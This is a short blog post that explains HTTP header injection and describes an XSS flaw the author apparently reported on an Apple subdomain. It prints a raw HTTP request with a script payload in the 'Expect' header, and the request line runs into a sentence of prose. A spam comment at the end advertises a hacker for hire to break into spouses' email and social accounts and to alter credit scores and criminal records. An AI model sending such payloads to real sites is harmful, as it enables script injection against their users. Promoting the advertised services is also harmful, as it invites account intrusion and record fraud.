HTTP Header
HTTP Header is the component of HTTP requests and responces. Header fields are transimitted with each request and responce and carry additional data about the requests and responces.See the typical request and responce headers Here at Web-Sniffer.net
HTTP header injection
HTTP header injection is a kind of web application vulnerability which exists on those web applications that generatd HTTP headers based on the input given by users. If it uses User based input in the headers, it can be used for HTTP response splitting, cross-site scripting (XSS), Session fixation via the Set-Cookie header, and malicious redirects attacks via the location header.
I recently found a similar kind of vulnerability in http://canadaedu.apple.com and for this I was also acknowledged by Apple on its website.
It used apache 1.3.33 that was vulnerable to the HTML and malicious javascript injection through "Expect" header.
See the responce header of the website:
GET / HTTP/1.0The alert box added in the Expect field could be injected for Cross Site Scripting.
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: canadaedu.apple.com
Cookie: PHPSESSID=3b8026225d719c6945155129c5c7335d
Connection: Close
Expect: <script>alert(411731119275)</script>
Pragma: no-cache
1 comment:
Do you need to increase your credit score?
Do you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com
Post a Comment